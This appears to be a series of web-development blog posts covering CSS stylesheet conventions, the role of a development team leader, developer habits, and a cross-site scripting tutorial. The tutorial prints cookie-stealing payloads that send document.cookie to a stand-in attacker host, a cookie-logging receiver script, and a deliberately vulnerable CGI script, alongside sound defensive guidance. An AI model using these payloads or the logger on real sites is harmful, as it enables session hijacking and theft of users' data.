However, this approach might not be enough for large projects where a single module is too big. In that case, you might need to divide your code into multiple files to maintain an overview of single groups of code fragments. In such situations a master stylesheet is used to import the groups. Using a master stylesheet generates some unnecessary server requests, but the approach produces clean and elegant code which is easy to reuse, easy to understand and easy to maintain. And you only need to include the master file in your documents.

/*——————————————————————
[Master Stylesheet]

Project:    Smashing Magazine
Version:    1.1
Last change:    05/02/08 [fixed Float bug, vf]
Assigned to:    Vitaly Friedman (vf), Sven Lennartz (sl)
Primary use:    Magazine
——————————————————————-*/
@import "reset.css";
@import "layout.css";
@import "colors.css";
@import "typography.css";
@import "flash.css";
/* @import "debugging.css"; */

For large projects or large development teams it is also useful to keep a brief update log and some additional information about the project, e.g. whom the CSS file is assigned to and its primary use (e.g. Smashing Magazine, Smashing Jobs etc.).

Additionally, you can include debugging CSS code to take care of diagnostic styling in case you run into problems. Consider using Eric Meyer's Diagnostic Styling as a debugging stylesheet to test your CSS code and fix problems.

2. Define a table of contents

To keep an overview of the structure of your code, you might want to consider defining a table of contents at the beginning of your CSS files. One possibility is to display a tree overview of your layout with the IDs and classes used in each branch of the tree. You may want to use keywords such as header-section or content-group to be able to jump to specific code immediately.

You may also select some important elements you are likely to change frequently after the project is released. These classes and IDs may also appear in your table of contents, so when you need to find them you'll find them immediately, without scanning your whole code or trying to remember what class or ID you once used.

/*——————————————————————
[Layout]

* body
    + Header / #header
    + Content / #content
        – Left column / #leftcolumn
        – Right column / #rightcolumn
        – Sidebar / #sidebar
            – RSS / #rss
            – Search / #search
            – Boxes / .box
            – Sideblog / #sideblog
    + Footer / #footer

Navigation      #navbar
Advertisements      .ads
Content header      h2
——————————————————————-*/

…or like this:

/*——————————————————————
[Table of contents]

1. Body
    2. Header / #header
        2.1. Navigation / #navbar
    3. Content / #content
        3.1. Left column / #leftcolumn
        3.2. Right column / #rightcolumn
        3.3. Sidebar / #sidebar
            3.3.1. RSS / #rss
            3.3.2. Search / #search
            3.3.3. Boxes / .box
            3.3.4. Sideblog / #sideblog
            3.3.5. Advertisements / .ads
    4. Footer / #footer
——————————————————————-*/

Another approach is to use simple enumeration without indentation. In the example below, when you need to jump to the RSS section you simply use a search tool to find 8. RSS in your code. That's easy, quick and effective.

/*——————————————————————
[Table of contents]

1. Body
2. Header / #header
3. Navigation / #navbar
4. Content / #content
5. Left column / #leftcolumn
6. Right column / #rightcolumn
7. Sidebar / #sidebar
8. RSS / #rss
9. Search / #search
10. Boxes / .box
11. Sideblog / #sideblog
12. Advertisements / .ads
13. Footer / #footer
——————————————————————-*/
/* … some CSS code … */

/*——————————————————————
[8. RSS / #rss]
*/
#rss { … }
#rss img { … }

By defining a table of contents you make it particularly easy for other people to read and understand your code. For large projects you may also print it out and have it in front of you when reading the code. When working in a team, this advantage shouldn't be underestimated; it can save a lot of time for you and your colleagues.

3. Define your colors and typography

Since we don’t have CSS constants yet, we need to figure out some way to get a quick reference of “variables” we are using. In web development colors and typography can often be considered as “constants” — fixed values that are used throughout the code multiple times.

As Rachel Andrew states, “one way to get round the lack of constants in CSS is to create some definitions at the top of your CSS file in comments, to define constants. A common use for this is to create a color glossary. This means that you have a quick reference to the colors used in the site to avoid using alternates by mistake and, if you need to change the colors, you have a quick list to go down and do a search and replace.”

/*——————————————————————
# [Color codes]

# Dark grey (text): #333333
# Dark Blue (headings, links) #000066
# Mid Blue (header) #333399
# Light blue (top navigation) #CCCCFF
# Mid grey: #666666
# */

Alternatively, you can also describe color codes used in your layout. For a given color, you can display sections of your site which are using this color. Or vice versa — for a given design element you can describe the colors which are used there.

/*——————————————————————
[Color codes]

Background:    #ffffff (white)
Content:    #1e1e1e (light black)
Header h1:    #9caa3b (green)
Header h2:    #ee4117 (red)
Footer:        #b5cede (dark black)

a (standard):    #0040b6 (dark blue)
a (visited):    #5999de (light blue)
a (active):    #cc0000 (pink)
——————————————————————-*/

The same holds for typography. You can also add some important notes to understand the “system” behind your definitions.

/*——————————————————————
[Typography]

Body copy:        1.2em/1.6em Verdana, Helvetica, Arial, Geneva, sans-serif;
Headers:        2.7em/1.3em Helvetica, Arial, "Lucida Sans Unicode", Verdana, sans-serif;
Input, textarea:    1.1em Helvetica, Verdana, Geneva, Arial, sans-serif;
Sidebar heading:    1.5em Helvetica, Trebuchet MS, Arial, sans-serif;

Notes:    decreasing heading by 0.4em with every subsequent heading level
——————————————————————-*/

4. Order CSS properties

When writing code, it's often useful to apply some special formatting to order CSS properties, making the code more readable, more structured and therefore more intuitive. There is a variety of grouping schemes developers use in their projects. Some developers tend to put colors and fonts first; other developers prefer to put "more important" assignments, such as those related to positioning and floats, first. Similarly, elements are also often sorted according to the topology of the site and the structure of the layout. This approach can be applied to CSS selectors as well:

    body,
    h1, h2, h3,
    p, ul, li,
    form {
        border: 0;
        margin: 0;
        padding: 0;
    }

Some developers use a more interesting approach: they group properties in alphabetical order. Here it's important to mention that alphabetizing CSS properties can change behavior, because declaration order matters when a shorthand property and one of its longhand forms set the same thing. Make sure no rendering changes are produced as a result of your ordering manipulations; an example of the pitfall follows the block below.

body {
    background: #fdfdfd;
    color: #333;
    font-size: 1em;
    line-height: 1.4;
    margin: 0;
    padding: 0;
}
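Here is a case where alphabetizing changes the rendering: a shorthand resets every sub-property it doesn't mention, so its position relative to the matching longhand matters (the selector and values are made up):

/* Original order: the shorthand comes last and resets background-color */
.box { background-color: red; background: url(dots.png) no-repeat; }

/* Alphabetized: background-color now comes last and wins; the box turns red */
.box { background: url(dots.png) no-repeat; background-color: red; }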

Whatever grouping format you are using, make sure you clearly define the format and the objective you want to achieve. Your colleagues will thank you for your efforts. And you’ll thank them for sticking to your format.

5. Indentation is your friend!

For a better overview of your code you might consider using one-liners for brief fragments of code. This style might produce messy results if you define more than three properties for a given selector. However, used moderately, it can highlight dependencies between elements of the same class. This technique will dramatically increase code readability when you have to find a specific element in your stylesheet.

#main-column { display: inline; float: left; width: 30em; }
        #main-column h1 { font-family: Georgia, "Times New Roman", Times, serif; margin-bottom: 20px; }
        #main-column p { color: #333; }

Suppose you made a change earlier in the day: you remember exactly what you did and can jump back in there and fix it. But what if you made a lot of changes that day, or you simply can't remember? Chris Coyier suggests an interesting solution for highlighting recent changes in your CSS code. By simply indenting new or changed lines in your CSS you can make recent changes more visible. You can also use comment keywords (e.g. @new); then you can jump to each occurrence of the keyword and undo changes once you've found a problem.

#sidebar ul li a {
     display: block;
     background-color: #ccc;
          border-bottom: 1px solid #999; /* @new */
     margin: 3px 0 3px 0;
          padding: 3px; /* @new */
}

Conclusion

CSS styleguides are helpful if and only if they are used properly. Keep in mind that you should remove every styleguide convention which doesn't effectively help you get a better understanding of the code or achieve well-structured code. Avoid too many styleguides for too many elements bundled in too many groups. Your goal is readable and maintainable code. Stick to it and you'll save yourself a lot of trouble.

Being a Development Team Leader?

I’d like to become a Development Team Leader

Hopefully most developers who say this have actually considered the change of role and are looking for new challenges and ways to contribute more to their chosen profession. However, for some it's an automatic response to a question that is particularly difficult to answer in an industry with no clear career path. For others it's simply a way to move up the pay scale.

Before you start talking to your manager or applying for your next job, it's worth considering what you're getting yourself into. Depending on where you work there will be different definitions of a Development Team Leader (DTL). To put this post in perspective, this is my interpretation:

A Development Team Leader is someone who owns the technical delivery of a solution. They need to understand the business drivers behind the project and be able to lead a team of developers to realise these drivers in working software. They are (IMHO) the central player in a project team and need to maintain excellent communication with all members of the team, from client to developers and everyone in between.

I tend to distinguish between what I call a Senior Developer (SD) and a DTL. An SD is someone who still does the tasks of a developer but does them really well and has lots of experience. They don't tend to have the added responsibilities of a DTL. DTLs often (but not necessarily) have an SD background.

Assuming you’re a developer this is what I reckon your job entails.

Let's face it: the life of your average developer is focused around cutting code. Sure, you might have daily Scrums or other team meetings to attend, but your main focus is writing software. And you love it!

When you become a DTL, your work balance is up for a bit of a change.

Other than the coding slice, don't pay too much attention to the relative weights of the pie slices – suffice to say you won't be zoning out for 8 hours a day to your favourite tunes. You're the one that gets interrupted, you're the one putting out the fires and making sure the wheels are oiled. Your head is on the line if the solution doesn't meet expectations or is delivered late. You have some responsibilities and influence now.

Coding – don’t worry, you still get to practice your craft but just not as much as you used to. There are now lots of other things that you need to be involved in too.
Documentation – even with the increasing popularity of Agile methodologies and a move away from excessive documentation there are still times when (technical) documentation is necessary – and guess what? You will be first in line to do it.
Meetings – if you thought you were in lots of meetings as a developer then you ain’t seen nothing yet. Depending on the size of the project you are involved in you will be the main participant in a wide variety of meetings. Whether it’s a meeting with the client, the delivery team, the PM, you are the one with the most knowledge of both the requirements and the implementation of the solution.
Communications – beyond official meetings you will also be heavily involved with communicating to others via emails, issue tracking software, the phone and face to face catch ups on progress. It’s a bit of a cliche but good communication skills really are the key to succeeding in many professions – and for any leadership role it’s essential.
Delegation – because of your other duties it’s an essential part of your role to be able to delegate work to others. Someone once told me that the job of the DTL is to make themselves redundant – an apparent contradiction to your pivotal role on the project but one that sums up the responsibility you have to ensure the project moves forward even when you can’t personally be there to solve an issue. The more you delegate responsibility to others in your team the more involved and productive they become. Don’t try and do everything yourself.
Mentoring – part of the reason for delegating tasks to others is to provide them with opportunities for personal growth and development. Mentoring carries this idea further and is a key part of your role. No one is an island, and you must be prepared to share your knowledge with others. As an aside, you should also be prepared to learn from your team – DTLs who think they know it all are usually wrong and always disruptive to the morale and effectiveness of the team.

How to Become a Development Team Leader?

As Development Manager to a team of incredibly motivated and talented individuals I often have conversations that begin,

    Hey Tokes, I really want to move my career to the next step and want to know what I can do to become a Development Team Leader.

My response,

    Act like one!

That's right, it's that simple. Wherever possible, take it upon yourself to assume some of the tasks that would normally be expected of a DTL. The more DTL skills you display, the more likely others will see you in that light and give you the opportunity to perform the role for real. Whatever you do, don't sit quietly behind your desk with the headphones on and expect someone to recognise your leadership potential and tap you on the shoulder – it won't happen. Similarly, don't assume that because you're a technical genius becoming a DTL is the natural next step in your career or something you deserve in recognition of your talents. The skills of a DTL go beyond the technical and require other skills: great communication, the ability to delegate, confidence, being level-headed, acting in a professional manner…

So what can you do, I hear you ask? You're only a developer, right? Wrong: the act of developing is only part of what you have to offer.

Let it Be Known – it seems obvious, but you should let your manager/PM/peers or anyone else who will listen know that you want to become a DTL. Don't be a nag about it; just plant the seed in people's minds.

Understand the Big Picture – one of the big differences between a good developer and a great one is their ability (or interest) to understand the big picture. They understand the business goals and pain points the system is addressing. They understand the entire solution, not just their part of it. They understand how the code they are writing benefits the client and the solution as a whole. They understand the client and what is important to them. They understand that the code is a means to an end and that project success will be primarily measured by client satisfaction.

Ask Questions – I love working with people who ask questions. It shows you are attempting to understand things thoroughly. It shows you're not afraid to question why something is being done in a certain way. It shows that, as a DTL, I'm not the only one thinking things through and that there's more chance the team is on the right track. Understanding the Big Picture is crucial to being able to ask the right questions.

Don't Wait to Be Asked – while you should always be on top of the tasks delegated to you, don't stop there. Be hungry like a wolf, hunting out ways in which you can add value, help others, and identify issues. Don't wait for your own DTL to ask you to do something; try to always be one step ahead without, of course, second-guessing their authority.

Be Approachable – DTLs are often the go-to guys (or gals), but they're also pulled away from the team to attend meetings and the like. Be approachable (i.e. take off the headphones now and then!) and aim to be the one people seek out when the DTL's away – this is a great sign that you have the respect of the team. If you're doing the things above, this will be a natural consequence and shouldn't require you to do anything specific.

Stay Calm – what was it that Mr Kipling said? "If you can keep your head when all about you are losing theirs… you'll be a DTL, my son!" Software development can be a stressful business. Look around at the DTLs you respect – guaranteed they will be the level-headed ones, the ones who don't let the pressure get the better of them (or at least are good at hiding it!)

What makes one developer better than another?

Shouldn't we all be performing at the same level? Of course not; we're not sewing buttons on an assembly line. We're using every bit of our intelligence to create something that we can only begin to understand.

    * I think logically. Computers don't care how you feel, and your opinion doesn't matter. All that matters is whether you write your code exactly the way the computer dictates.
    * I constantly look for better ways of doing things. I subscribe to a good number of development blogs. I alone cannot always come up with the best way to solve a problem, but somebody somewhere probably can.
    * I read books. Joel says that most programmers have stopped reading books. What a shame. Blogs are great for snippets, but it’s rare that they cover a topic well from start to finish. Blogs are the ADD version of books.
    * I don’t stop thinking about problems and how to solve them through automation. Sometimes I’ll wake up in the middle of the night, and I can’t get back to sleep until I write some code that I can’t get out of my head.
    * I have side projects that I think are interesting, and give me a chance to try things that I might not want to try on my production code at work. Yes, my side projects distract me at work, but the knowledge I gain pays back the time I lost.
    * I have a tech blog. I suggest all developers start a blog and give back to the community. If you solve a problem, we want to hear about it! At the very least, it will give you an opportunity to formalize your ideas, which will either reinforce them, or make you realize you were wrong. You might also get some great feedback.
    * I try to prove myself wrong (in other words, I try to stay objective). Everyone wants to be right, but I try to prove myself wrong when appropriate. One of the hardest things in the world for a developer is to admit that the code they just spent a week writing is useless. Maybe it is – don't fight it, work with it.
    * I keep up with the latest technologies, and force myself to try them.
    * I have a relatively good understanding of how computer hardware and software work. I've met too many developers who barely know how to turn on a computer.
    * I’m great at writing Google queries.
    * I’m not just in it for the money. I actually enjoy what I do. I had a job interview where the guy that would have been my boss told me a story about how he was brought in off the street and thrown into managing their software projects. When the software industry starts getting rough, who do you think is the first person to go?
    * I'm sympathetic to the users' pain. If I can share their pain, I'll want to fix it and prevent it.
    * I realize my code will never be perfect, so I try to make it testable and modular. I set up processes that try to minimize the effect of my human error.
    * I don’t think Microsoft is evil, and I don’t think they’re a saint. They’re a big company. Some of the stuff they write is crap, some is amazing. The same is true for any other company out there.
    * I learn from my mistakes. I try to put at least 2 checks in place to avoid any past mistakes. If one check fails, I’ll have the other.
    * When I'm asked to solve a problem, I think above the problem and determine whether it's a problem that even needs solving.

Cross-site scripting attacks: how to prevent them?

Cross-site scripting (XSS for short) is one of the most common application-level attacks that hackers use to sneak into Web applications. XSS is an attack on the privacy of clients of a particular Web site, which can lead to a total breach of security when customer details are stolen or manipulated. Most attacks involve two parties: either the attacker and the Web site or the attacker and the client victim. Unlike those, the XSS attack involves three parties: the attacker, the client, and the Web site.

The goal of the XSS attack is to steal the client cookies or any other sensitive information that can identify the client to the Web site. With the token of the legitimate user in hand, the attacker can proceed to act as that user in interactions with the site – in other words, to impersonate the user. For example, in one audit conducted for a large company, it was possible to peek at the user's credit card number and private information by using an XSS attack. This was achieved by running malicious JavaScript code in the victim's (client's) browser with the access privileges of the Web site – the very limited JavaScript privileges that generally do not let a script access anything but site-related information. It is important to stress that, although the vulnerability exists at the Web site, at no time is the Web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. As a result, the attacker gets the cookies and impersonates the victim.

Explanation of the XSS technique

Let's call the site under attack www.vulnerable.site. At the core of a traditional XSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or the path) and echoes it back to the response page, in full or in part, without first sanitizing it (that is, without making sure it doesn't contain JavaScript code or HTML tags). Suppose that this script is named welcome.cgi and its parameter is name. It can be invoked this way:

  GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
  Host: www.vulnerable.site
   
The response would be:

  <HTML>
  <Title>Welcome!</Title>
  Hi Joe Hacker <BR>
  Welcome to our system
  …
  </HTML>
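
To make the flaw concrete, here is a minimal sketch of what such a vulnerable script could look like. The original welcome.cgi could be written in any language, so this Python CGI reconstruction is purely an assumption for illustration:

  #!/usr/bin/env python3
  # welcome.cgi -- deliberately vulnerable sketch, for illustration only.
  import os
  from urllib.parse import parse_qs

  # Parse the query string handed over by the Web server (CGI convention).
  params = parse_qs(os.environ.get("QUERY_STRING", ""))
  name = params.get("name", ["guest"])[0]

  print("Content-Type: text/html")
  print()
  print("<HTML>")
  print("<Title>Welcome!</Title>")
  print(f"Hi {name} <BR>")  # the flaw: user input echoed without sanitization
  print("Welcome to our system")
  print("</HTML>")

The single dangerous line is the one that echoes name back verbatim; everything that follows in this article stems from it.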

How can this be abused? Well, the attacker manages to lure the victim client into clicking a link that the attacker supplies. This carefully and maliciously crafted link causes the victim's Web browser to access the site (www.vulnerable.site) and invoke the vulnerable script. The data passed to the script consists of JavaScript that accesses the cookies the client browser has stored for www.vulnerable.site. This is allowed because the client browser "experiences" the JavaScript as coming from www.vulnerable.site, and the JavaScript security model allows scripts arriving from a particular site to access cookies that belong to that site.

Such a link looks like this one:

http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
 
The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows:

  GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
  Host: www.vulnerable.site …

The vulnerable site response would be:

  <HTML>
  <Title>Welcome!</Title>
  Hi <script>alert(document.cookie)</script> <BR>
  Welcome to our system
  …
  </HTML>
 
The victim client’s browser would interpret this response as an HTML page containing a piece of JavaScript code. This code, when executed, is allowed to access all cookies belonging to www.vulnerable.site. Therefore, it will pop up a window at the client browser showing all client cookies belonging to www.vulnerable.site.

Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may erect a Web site (www.attacker.site) and use a script to receive the cookies. Instead of popping up a window, the attacker would write code that accesses a URL at www.attacker.site, thereby invoking the cookie-reception script, with a parameter being the stolen cookies. This way, the attacker can get the cookies from the www.attacker.site server.
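
As a sketch of the receiving side, a minimal collect.cgi (the script name comes from this article; the Python body below is a hypothetical illustration) might simply log whatever arrives in the cookie parameter:

  #!/usr/bin/env python3
  # collect.cgi -- sketch of the attacker's cookie-collection endpoint.
  import os
  from urllib.parse import parse_qs

  params = parse_qs(os.environ.get("QUERY_STRING", ""))
  stolen = params.get("cookie", [""])[0]

  # Append the stolen value to a log file for later use by the attacker.
  with open("stolen_cookies.log", "a") as log:
      log.write(stolen + "\n")

  # Return an empty response so the victim notices nothing unusual.
  print("Content-Type: text/plain")
  print()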

The malicious link would be:

http://www.vulnerable.site/welcome.cgi?name=<script>window.open("http://www.attacker.site/collect.cgi?cookie="%2Bdocument.cookie)</script>
     
And the response page would look like:

  <HTML>
  <Title>Welcome!</Title>
  Hi <script>window.open("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script> <BR>
  Welcome to our system
  …
  </HTML>
   
The browser, immediately upon loading this page, would execute the embedded JavaScript and send a request to the collect.cgi script in www.attacker.site, with the value of the cookies of www.vulnerable.site that the browser already has. This compromises the cookies of www.vulnerable.site that the client holds and allows the attacker to impersonate the victim; the privacy of the client is completely breached.

Note:
Causing the JavaScript pop-up window to appear usually suffices to demonstrate that a site is vulnerable to an XSS attack: if the JavaScript alert function can be called, there is usually no reason for the window.open call not to succeed. That is why most examples of XSS attacks use the alert function, which makes success very easy to detect.

Scope and feasibility

The attack can take place only at the victim’s browser, the same one used to access the site (www.vulnerable.site). The attacker needs to force the client to access the malicious link. This can happen in these ways:

    * The attacker sends an e-mail message containing an HTML page that forces the browser to access the link. This requires the victim to use an HTML-enabled e-mail client, and the HTML viewer at the client must be the same browser used for accessing www.vulnerable.site.

    * The client visits a site, perhaps operated by the attacker, where a link to an image or otherwise-active HTML forces the browser to access the link. Again, it is mandatory that the same browser be used for accessing both this site and www.vulnerable.site.

The malicious JavaScript can access any of this information:

    * Permanent cookies (of www.vulnerable.site) maintained by the browser
    * RAM cookies (of www.vulnerable.site) maintained by this instance of the browser, only when it is currently browsing www.vulnerable.site
    * Names of other windows opened for www.vulnerable.site
    * Any information that is accessible through the current DOM (from values, HTML code, and so forth)

Identification, authentication, and authorization tokens are usually maintained as cookies. If these cookies are permanent, the victim is vulnerable to the attack even when not using the browser at the moment to access www.vulnerable.site. If, however, the cookies are temporary, such as RAM cookies, then the client must be in session with www.vulnerable.site.

Another possible implementation of an identification token is a URL parameter. In such cases, it is possible to access other windows by using JavaScript in this way (assuming that the window containing the page with the necessary URL parameters is named foobar):

<script>var victim_window=open('','foobar');alert('Can access: '+victim_window.location.search)</script>
 
Variations on this theme

It is possible to use many HTML tags besides <SCRIPT> to run the JavaScript. In fact, it is also possible for the malicious JavaScript code to reside on another server and to force the client to download and execute the script, which can be useful if a lot of code is to be run or when the code contains special characters.

A couple of variations on these possibilities:

    * Rather than <script>…</script>, hackers can use <img src="javascript:…">. This is good for sites that filter the <script> HTML tag.

    * Rather than <script>…</script>, it is possible to use <script src="http://…">. This is good for a situation where the JavaScript code is too long or when it contains forbidden characters.

Sometimes, the data embedded in the response page is found in a non-free HTML context. In this case, it is first necessary to "escape" to the free context and then append the XSS attack. For example, if the data is injected as the default value of an HTML form field:


<input type=text name=user value="…">

Then it is necessary to include "> at the beginning of the data to ensure escaping into the free HTML context. The data would be:

"><script>window.open("http://www.attacker.site/collect.cgi?cookie=
"+document.cookie)</script>

And the resulting HTML would be:


<input type=text name=user value=""><script>window.open("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script>">

Other ways to perform traditional XSS attacks

So far, we have seen that an XSS attack can take place in a parameter of a GET request that is echoed back to the response by a script. But it is also possible to carry out the attack with a POST request or by using the path component of the HTTP request — and even by using some HTTP headers (such as the Referer).

In particular, the path component is useful when an error page returns the erroneous path. In this case, including the malicious script in the path will often execute it. Many Web servers have been found vulnerable to this attack.

What went wrong?

It is important to understand that, although the Web site is not directly affected by this attack (it continues to function normally, malicious code is not executed on the site, no DoS condition occurs, and data is not directly manipulated nor read from the site), it is still a flaw in the privacy that the site offers its visitors, or clients. This is just like a site deploying an application with weak security tokens, whereby an attacker can guess the security token of a client and impersonate him or her.

The weak spot in the application is the script that echoes back its parameter regardless of its value. A good script makes sure that the parameter is of a proper format, contains reasonable characters, and so on. There is usually no good reason for a valid parameter to include HTML tags or JavaScript code, and these should be removed from the parameter, to be on the safe side, before it is embedded in the response or processed by the application.
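
As a sketch of such a check, a strict allowlist test on the name parameter might look like this in Python (the pattern is an assumption about what a "reasonable" name contains; adjust it to the actual data):

  import re

  # Allowlist: letters, spaces, hyphens, and apostrophes -- none of the
  # characters (<, >, ", etc.) needed to break into an HTML or script context.
  NAME_PATTERN = re.compile(r"^[A-Za-z][A-Za-z' -]{0,63}$")

  def is_valid_name(value: str) -> bool:
      """Return True only if the parameter matches the expected format."""
      return bool(NAME_PATTERN.match(value))

  assert is_valid_name("Joe Hacker")
  assert not is_valid_name("<script>alert(document.cookie)</script>")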

How to secure a site against XSS attacks

It is possible to secure a site against an XSS attack in three ways:

   1. By performing in-house input filtering (sometimes called input sanitization). For each user input – be it a parameter or an HTTP header – in each script written in-house, advanced filtering against HTML tags, including JavaScript code, should be applied. For example, the welcome.cgi script from the previous case study should filter the <script> tag after decoding the name parameter. This method has some severe downsides, though:
          * It requires the application programmer to be well-versed in security.
          * It requires the programmer to cover all possible input sources (query parameters, body parameters of POST requests, HTTP headers).
          * It cannot defend against vulnerabilities in third-party scripts or servers. For example, it won’t defend against problems in error pages in Web servers (which display the path of the resource).

   2. By performing "output filtering," that is, filtering the user data when it is sent back to the browser rather than when it is received by a script (a minimal escaping sketch follows this list). A good example of this would be a script that inserts the input data into a database and then presents it. In this case, it is important not to apply the filter to the original input string, but only to the output version. The drawbacks are similar to those for input filtering.

   3. By installing a third-party application firewall, which intercepts XSS attacks before they reach the Web server and the vulnerable scripts, and blocks them. Application firewalls can cover all input methods in a generic way (including the path and HTTP headers), regardless of whether the script or path belongs to the in-house application, to a third-party script, or to no resource at all (for example, one designed to provoke a 404 page response from the server). For each input source, the application firewall inspects the data against various HTML tag and JavaScript patterns; if any match, the request is rejected and the malicious input never reaches the server.
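
The escaping sketch promised in the output-filtering item above could be as small as the following; it relies on Python's standard html.escape, and render_welcome is a hypothetical helper name:

  from html import escape

  def render_welcome(name: str) -> str:
      """Build the welcome page, escaping the user value on output.

      html.escape turns <, >, &, and quotes into HTML entities, so even
      '<script>alert(document.cookie)</script>' is rendered as inert text
      instead of being executed by the browser.
      """
      return (
          "<HTML>"
          "<Title>Welcome!</Title>"
          f"Hi {escape(name, quote=True)} <BR>"
          "Welcome to our system"
          "</HTML>"
      )

  print(render_welcome("<script>alert(document.cookie)</script>"))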

Ways to check whether your site is protected from XSS

Checking that a site is secure from XSS attacks is the logical conclusion of securing it. Just like securing a site against XSS, checking can be done manually (the hard way) or with an automated Web application vulnerability-assessment tool, which offloads the burden of checking. The tool crawls the site and then launches all the variants it knows against all of the scripts it finds, trying the parameters, the headers, and the paths. In both methods, each input to the application (parameters of all scripts, HTTP headers, the path) is checked with as many variations as possible; if the response page contains the JavaScript code in a context where the browser can execute it, an XSS vulnerability is exposed. For example, sending this text:

<script>alert(document.cookie)</script>

to each parameter of each script through a JavaScript-enabled browser will reveal an XSS vulnerability of the simplest kind: the browser will pop up the JavaScript Alert window if the text is interpreted as JavaScript code. Of course, there are several variants; therefore, testing only this one is insufficient. And, as you have already learned, it is possible to inject JavaScript into various fields of the request: the parameters, the HTTP headers, and the path. However, in some cases (notably the HTTP Referer header), it is awkward to carry out the attack by using a browser.
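
As a sketch of the automated approach, a probe might inject that payload into each parameter and check whether it is echoed back verbatim. The URL and parameter name below are this article's fictional examples, and a real scanner would cover far more variants and contexts:

  import urllib.parse
  import urllib.request

  PAYLOAD = "<script>alert(document.cookie)</script>"

  def probe(base_url: str, param: str) -> bool:
      """Send the test payload in one parameter and report whether the
      response echoes it back verbatim -- a strong hint (though not proof)
      of a reflected XSS vulnerability."""
      query = urllib.parse.urlencode({param: PAYLOAD})
      with urllib.request.urlopen(f"{base_url}?{query}") as resp:
          body = resp.read().decode(errors="replace")
      return PAYLOAD in body

  # Hypothetical usage against the article's example site:
  # print(probe("http://www.vulnerable.site/welcome.cgi", "name"))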

Summary

Cross-site scripting is one of the most common application-level attacks that hackers use to sneak into Web applications, as well as one of the most dangerous. It is an attack on the privacy of clients of a particular Web site, which can lead to a total breach of security when customer details are stolen or manipulated. Unfortunately, as this article explains, this is often done without the knowledge of either the client or the organization being attacked.

To prevent Web sites from being vulnerable to these malicious acts, it is critical that an organization implement both an online and an offline security strategy. This includes using an automated vulnerability-assessment tool that can test for all of the common Web vulnerabilities and application-specific vulnerabilities (such as cross-site scripting) on a site. For a full online defense, it is also vital to install an application firewall that can detect and defend against any manipulation of the code and content sitting on and behind the Web servers.